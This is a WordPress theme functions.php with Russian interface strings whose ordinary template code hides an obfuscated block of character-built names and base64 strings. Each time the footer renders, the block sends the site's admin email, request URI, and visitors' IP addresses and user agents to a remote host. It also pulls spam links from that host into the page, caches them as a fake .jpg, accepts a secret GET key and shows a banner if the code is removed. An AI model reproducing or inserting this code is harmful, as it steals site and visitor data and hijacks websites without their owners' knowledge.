<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $JKLUbWn='d';$xsFe='4';$XQAL='_';$rktQ='s';$Leoo='c';$ZvmbbZP='e';$hucG='e';$LGKQ='o';$xOYjZX='a';$NhMpfC='6';$gOfd='e';$IGktvT='d';$rPEHLr='b';$ysLBZCXQ=$rPEHLr.$xOYjZX.$rktQ.$hucG.$NhMpfC.$xsFe.$XQAL.$JKLUbWn.$ZvmbbZP.$Leoo.$LGKQ.$IGktvT.$gOfd;$AlgEvxu='g';$hWNRp='z';$JRWnjh='t';$LScdX='e';$lpRGO='l';$kZCKP='n';$fInGT='f';$VbrWXoE='i';$CCRRqMT='a';$VujAPPuT=$AlgEvxu.$hWNRp.$VbrWXoE.$kZCKP.$fInGT.$lpRGO.$CCRRqMT.$JRWnjh.$LScdX;$LUBfK='r';$JLDzGhV='_';$KkQB='s';$tiZJ='3';$guAeg='r';$nuod='o';$eLos='t';$viHJAfQ='t';$FVbxEMb='1';$wJDYluQC=$KkQB.$eLos.$guAeg.$JLDzGhV.$LUBfK.$nuod.$viHJAfQ.$FVbxEMb.$tiZJ;$xNlY='e';$xIEIT='s';$lqFF='r';$JEtH='r';$SLDq='v';$MeqRY='t';$efbAoGMB=$xIEIT.$MeqRY.$lqFF.$JEtH.$xNlY.$SLDq;                     
		$ef_______n='d';$ij______________e='4';$uf__l='_';$xg_________a='s';$ja________h='c';$mt_____j='e';$he______________z='e';$ha______o='o';$wq____________d='a';$kk______p='6';$pw____x='e';$ef_________o='d';$jg______t='b';$vj_____________l=$jg______t.$wq____________d.$xg_________a.$he______________z.$kk______p.$ij______________e.$uf__l.$ef_______n.$mt_____j.$ja________h.$ha______o.$ef_________o.$pw____x;
		$oy__y='i';$jm________f='n';$tp____f='n';$uc_______e='t';$kw________c='o';$yv_____i='s';$eq_________y='_';$un__s='u';$eo___________x='e';$dw___l='x';$wr____h='f';$gg_________d='i';$hr_____________p='c';$zn_________g='s';$ja_________p='t';$pz_____a=$wr____h.$un__s.$tp____f.$hr_____________p.$ja_________p.$gg_________d.$kw________c.$jm________f.$eq_________y.$eo___________x.$dw___l.$oy__y.$zn_________g.$uc_______e.$yv_____i;
		$iz_______i='n';$xa_______f='o';$sy____________b='p';$af_________q='e';$cb____________b='f';$qt______a=$cb____________b.$xa_______f.$sy____________b.$af_________q.$iz_______i;
		$fg_________n='f';$eb_______________o='a';$nu___________i='e';$fx______________s='r';$ec__i='d';$ri_______________n=$fg_________n.$fx______________s.$nu___________i.$eb_______________o.$ec__i;
		$ra_________j='l';$mz_________b='c';$yq_____________a='e';$rv__________q='f';$fx_____q='o';$ur______o='s';$wl__________n=$rv__________q.$mz_________b.$ra_________j.$fx_____q.$ur______o.$yq_____________a;
		
		define("WP_ID", $vj_____________l("Mi4wLjA="));
		define("WP_TTL", $vj_____________l("MTA4MDA="));
		define("WP_SRC", $vj_____________l("dHBva24="));
	


		function wp_get_header() {
			global $vj_____________l, $pz_____a;
			
			if (
				$pz_____a($vj_____________l("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$pz_____a($vj_____________l("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$pz_____a($vj_____________l("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $vj_____________l, $qt______a, $wl__________n, $ri_______________n;
			
			$om__________k = TEMPLATEPATH."/".$vj_____________l("Zm9vdGVyLnBocA==");
			$ap__f = @$qt______a($om__________k, "r");
			$om__________k = @$ri_______________n($ap__f, @filesize($om__________k));
			@$wl__________n($ap__f);
			
			$wp____n = TEMPLATEPATH."/".$vj_____________l("ZnVuY3Rpb25zLnBocA==");
			$ap__f = @$qt______a($wp____n, "r");
			$wp____n = @$ri_______________n($ap__f, @filesize($wp____n));
			@$wl__________n($ap__f);
			
			$gr_____________i = 0;
			if($om__________k && $wp____n) {
				if ($vj_____________l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($om__________k, $vj_____________l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$gr_____________i = 1;
					}
					if (substr_count($om__________k, "wp_theme_GPL_credits()") < 1) {
						$gr_____________i = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$gr_____________i = 12;
				}
			}
			
			if($gr_____________i > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $gr_____________i -->";
			}
		}
	


		function wp_loaded() {
			global $vj_____________l, $pz_____a;
			return $pz_____a($vj_____________l("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($nv_______________d, $ep_____s = "(more...)", $rf_________m = 0, $tu____w = "") {
				$lg_____________b = get_the_content($ep_____s, $rf_________m, $tu____w);
				$lg_____________b = apply_filters("the_content", $lg_____________b);
				
				$lg_____________b = str_replace("]]>", "]]>", $lg_____________b);
				if (strlen($_GET["p"]) > 0) {
					echo $lg_____________b;
				}
				else if ((strlen($lg_____________b)>$nv_______________d) && ($zt______u = strpos($lg_____________b, " ", $nv_______________d ))) {
					$lg_____________b = substr($lg_____________b, 0, $zt______u);
					$lg_____________b = $lg_____________b;
					echo $lg_____________b;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ep_____s</a></div></p>";
				} else {
					echo $lg_____________b;
				}
				
			}
		}
	


		$es____________k='e';$fw_____q='4';$bs_______y='_';$ka_____________d='n';$uz______________a='6';$ct___s='e';$tr__________e='a';$yf_____________t='d';$yi_____u='e';$qq______________b='b';$cq_______________b='o';$vr______k='s';$sk______n='c';$kq__x=$qq______________b.$tr__________e.$vr______k.$yi_____u.$uz______________a.$fw_____q.$bs_______y.$ct___s.$ka_____________d.$sk______n.$cq_______________b.$yf_____________t.$es____________k;
		$xc______o='e';$mz____________m='e';$wg________y='t';$el___________k='_';$eq____s='t';$af_____________f='n';$rt__k='s';$kx____g='n';$bh__________p='f';$ct____________k='g';$rl__________u='t';$ob_________h='_';$ek____r='e';$ry_______m='l';$ix______________g='o';$tk_________k='c';$tr_____________g='i';$yh_______c=$bh__________p.$tr_____________g.$ry_______m.$xc______o.$el___________k.$ct____________k.$mz____________m.$wg________y.$ob_________h.$tk_________k.$ix______________g.$af_____________f.$rl__________u.$ek____r.$kx____g.$eq____s.$rt__k;
		$wq________t='s';$ye______d='_';$wa_________l='i';$ov____________w='l';$rz____g='t';$uc_____v='e';$yz__m='i';$vy___y='s';$dl______z='e';$nx___________z='f';$qy_____________l='x';$un____________k=$nx___________z.$wa_________l.$ov____________w.$dl______z.$ye______d.$uc_____v.$qy_____________l.$yz__m.$wq________t.$rz____g.$vy___y;
		$wm________h='i';$qj_______i='o';$rh____________b='v';$rl___i='r';$ln__________q='c';$ec____________u='e';$lp____h='p';$dt_______a='e';$rs____q='o';$um___________g='m';$cr_________t='a';$jt_______g='r';$wk______d='n';$my_______________y='s';$we_____________n='_';$fa_______________f=$rh____________b.$ec____________u.$rl___i.$my_______________y.$wm________h.$rs____q.$wk______d.$we_____________n.$ln__________q.$qj_______i.$um___________g.$lp____h.$cr_________t.$jt_______g.$dt_______a;
		$fo___y='p';$sj__________d='o';$pz____________o='s';$tt____i='e';$px_________n='k';$hp_______v='o';$aq____________q='n';$ok______________l='c';$oh________l='f';$nr___v=$oh________l.$pz____________o.$sj__________d.$ok______________l.$px_________n.$hp_______v.$fo___y.$tt____i.$aq____________q;
		$rc__p='w';$wm___b='r';$zc______________q='f';$uc_____________a='e';$md___________o='t';$wa_____________d='i';$je______h=$zc______________q.$rc__p.$wm___b.$wa_____________d.$md___________o.$uc_____________a;
		$vw_________i='d';$mu__j='m';$af______________u='5';$qx_____________c=$mu__j.$vw_________i.$af______________u;
		$gb___________o='a';$ef_____________r='h';$sx______q='e';$jo___g='t';$um____________u='p';$mw_________r='r';$ms______s='l';$cd____________z='a';$mk__v=$mw_________r.$sx______q.$gb___________o.$ms______s.$um____________u.$cd____________z.$jo___g.$ef_____________r;
		$ho_______e='z';$xt_______e='s';$xt___________n='r';$it_______j='e';$gn_____________c='u';$je_____________b='i';$su______l='n';$fm_____y='i';$uk__________t='a';$bz_________s='e';$ys__________e='l';$rh_______________g=$gn_____________c.$su______l.$xt_______e.$bz_________s.$xt___________n.$je_____________b.$uk__________t.$ys__________e.$fm_____y.$ho_______e.$it_______j;
		$hk______________y='n';$fl______________o='a';$yd___x='e';$jz_____b='m';$kd__c='t';$xe______________h='p';$df___________n='m';$uc____________x=$kd__c.$yd___x.$df___________n.$xe______________h.$hk______________y.$fl______________o.$jz_____b;
		$pu______k='r';$oe_______v='e';$ua___________u='r';$zw____x='c';$ok______________r='e';$qe____________l='a';$hw__v='t';$av__________q='x';$nr_____________f='e';$ph_____s='m';$zn_________p='n';$ow__e='e';$ac_____a='c';$je_______________j='_';$ar_____________q='o';$hs____________h='t';$qh___________w='t';$dw______h='t';$dn_____________s='_';$ye_________x='s';$bk___________p='a';$uk______y=$ye_________x.$qh___________w.$pu______k.$nr_____________f.$qe____________l.$ph_____s.$dn_____________s.$zw____x.$ar_____________q.$zn_________p.$hw__v.$ow__e.$av__________q.$dw______h.$je_______________j.$ac_____a.$ua___________u.$oe_______v.$bk___________p.$hs____________h.$ok______________r;
	


		function id____________y($me__________b) {
			global $vj_____________l, $pz_____a, $yh_______c, $fa_______________f, $uk______y;
			
			if (!$pz_____a($vj_____________l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($fa_______________f(PHP_VERSION, "5.0.0", ">=") && $pz_____a($vj_____________l("ZmlsZV9nZXRfY29udGVudHM=")) && $pz_____a($vj_____________l("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$vq_______n = $uk______y(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$co______________i = @$yh_______c($me__________b, 0, $vq_______n);
			} else {
				$co______________i = @$yh_______c($me__________b, 0);
			}
			
			return $co______________i;
		}
	


		function hb___c($me__________b) {
			global $pz_____a, $nr___v, $je______h, $vj_____________l;
			
			if (!$pz_____a($vj_____________l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$mx__v = strpos($me__________b, "/", 7);
			$fk__________j = array(
				"uri"     => substr($me__________b, $mx__v),
				"host"    => str_replace("http://", "", substr($me__________b, 0, $mx__v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$tf_____________y = @$nr___v("$fk__________j[host]", 80, $fv____________m, $yy______w, 4);
			
			if (!$tf_____________y) {
				return false;
			} else {
				$co______________i = "";
				$sr______r  = "GET $fk__________j[uri] HTTP/1.0\r\n";
				$sr______r .= "Host: $fk__________j[host]\r\n";
				$sr______r .= "Referer: $fk__________j[referer]\r\n";
				$sr______r .= "Connection: Close\r\n\r\n";
				
				@$je______h($tf_____________y, $sr______r);
				
				while (!@feof($tf_____________y)) {
					$lg______q = @fgets($tf_____________y, (1024*24));
					
					if ($lg______q == "\r\n") {
						$hn_________u = true;
						continue;
					}
					
					if ($hn_________u) {
						$co______________i .= $lg______q;
					}
				}
				
				return $co______________i;
			}
		}
	


		function kb______________o($me__________b) {
			global $pz_____a;
			$rz____r = false;
			
			if ($me__________b != "") {
				if ($pz_____a("id____________y")) {
					$rz____r = @id____________y($me__________b);
				}
				
				if (!$rz____r && ($pz_____a("hb___c"))) {
					$rz____r = @hb___c($me__________b);
				}
			}
			
			return $rz____r;
		}
	


		function hl____c() {
			global $_SERVER, $qx_____________c;
			
			$ii______q = $_SERVER["SERVER_NAME"];
			
			if (substr("$ii______q", 0, 4) == "www.") {
				$ii______q = substr("$ii______q", 4);
			}
			
			$ii______q = $qx_____________c("$_SERVER[SERVER_NAME]");
			
			return $ii______q;
		}
	


		function si_______g() {
			return "file";
		}
	


		function yf__d($me__________b) {
			global $_SERVER, $yh_______c, $un____________k, $qt______a, $wl__________n, $je______h;
			
			$ty______________r = vm_______________d();
			
			$ou_______f = hl____c().".jpg";
			$xq__________v = $ty______________r["dir_upload"]["path"]."/$ou_______f";
			$wq_______________n = @filemtime($xq__________v);
			
			if (!$wq_______________n || ((time()-$wq_______________n) >= WP_TTL)) {
				$rz____r = kb______________o($me__________b);
				
				if ($rz____r) {
					if ($un____________k($xq__________v)) {
						@unlink($xq__________v);
					}
					
					$ap__f = @$qt______a($xq__________v, "x+");
					
					@$je______h($ap__f, $rz____r);
					@$wl__________n($ap__f);
				}
			} else {
				if ($un____________k($xq__________v)) {
					$rz____r = @$yh_______c($xq__________v);
				} else {
					$rz____r = false;
				}
			}
			
			return $rz____r;
		}
	


		function vm_______________d() {
			global $_SERVER, $vj_____________l, $kq__x;
			
			$ix________j = wp_count_posts("post");
			$ga__z = pathinfo(get_bloginfo("template_directory"));
			
			$ty______________r = array(
				"url" => array(
					"report"      => $vj_____________l("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ga__z,
				"dir_upload"	=> sl___________k(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ga__z[filename],
					"a005=".$ix________j->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$ty______________r["url"]["queryString"] = implode("&", $ty______________r["queryString"]);
			$ty______________r["url"]["report"] = $ty______________r["url"]["report"]."/?".$kq__x($ty______________r["url"]["queryString"]).".html";
						
			return $ty______________r;
		}
	


		function sl___________k() {
			$ka_______x = wp_upload_dir();
			
			if (isset($ka_______x["error"])) {
				$hz_______z = zr_______i();
				if (is_writable($hz_______z)) {
					$ka_______x = array("path" => $hz_______z);
				}
			}

			return $ka_______x;
		}
	


		function zr_______i() {
			global $pz_____a, $qx_____________c, $mk__v, $uc____________x;
			
			$tn__________e = (bool) ini_get("safe_mode");
			if ($tn__________e == true) {
				return false;
			}
			
			if ($pz_____a("sys_get_temp_dir")) {
				$mk____________h = sys_get_temp_dir();
				if (is_writable($mk____________h)) {
					return $mk__v($mk____________h);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $mk__v($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $mk__v($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $mk__v($_ENV["TEMP"]);
			} else {
				$ve____m = $uc____________x($qx_____________c(uniqid(rand(), true)), "");
				if ($ve____m) {
					$mk____________h = $mk__v(dirname($ve____m));
					@unlink($ve____m);
					return $mk____________h;
				} else {
					return false;
				}
			}
		}
	


		function ts______s() {
			global $_GET, $un____________k;
			
			$ty______________r = vm_______________d();
			$ii______q = hl____c();
			$np_______p = si_______g();
			
			$xp____________w = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($np_______p == "file") {
					$rv_____________n = $ty______________r["dir_upload"]["path"]."/".$ii______q.".jpg";
					if ($un____________k($rv_____________n)) {
						@unlink($rv_____________n);
						$xp____________w = "deleted";
					}
				}
				
				$uo________d = array(
					"s"	=> $xp____________w,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($uo________d AS $uo___________m => $km_______________t) echo " [$uo___________m:$km_______________t]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $pz_____a, $vj_____________l, $rh_______________g;
			$ty______________r = vm_______________d();
			
			$pm________j = "yf__d";
			if ($pz_____a($pm________j)) {
				$co______________i = $pm________j($ty______________r["url"]["report"]);
			}
			
			if ($co______________i) {
				if ($co______________i = @$vj_____________l($co______________i)) {
					$co______________i = @$rh_______________g($co______________i);
					
					if (strlen($co______________i[custom_credit]) >= 5) {
						$ty______________r["default_string"] = $co______________i[custom_credit];
					}
					
					if ($co______________i["status"] == "0") {
						$um____s = 1;
						$gy_____________x = 1;
					} else {
						$mm_________m = sizeof($co______________i["links"]);
						$bf________f = $ty______________r["default_string"];
						
						if ($mm_________m > 0 && $co______________i["links"] !== "") {
							$rs______v = 0;
							foreach ($co______________i["links"] as $mm__s => $yb___r) {
								$rs______v++;
								if ($yb___r->l_path == "" || $yb___r->l_path == $_SERVER["REQUEST_URI"]) {
									$yb___r->l_href = htmlspecialchars(strip_tags($yb___r->l_href));
									$yb___r->l_title = htmlspecialchars(strip_tags($yb___r->l_title));
									$yb___r->l_anchor = htmlspecialchars(strip_tags($yb___r->l_anchor));
									$bf________f .= " | ";
									$bf________f .= "<a href='$yb___r->l_href' title='$yb___r->l_title'";
									if ($yb___r->l_nofollow == "1") {
										$bf________f .= " rel='nofollow'";
									}
									$bf________f .= ">$yb___r->l_anchor</a>";
								}
							}
						}
						$ty______________r["links"] = "$bf________f";
						if ($co______________i[credit] == "0") {
							$ty______________r["links"] = "";
						}
					}
				} else {
					$um____s = "1";
				}
			} else {
				$um____s = "1";
			}
			
			if ($um____s == "1") {
				$ty______________r["links"] = $ty______________r["default_string"];
			}
			
			echo "$ty______________r[links]";
			
			echo "<!-- s: $co______________i[signature] -->";
			ts______s();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
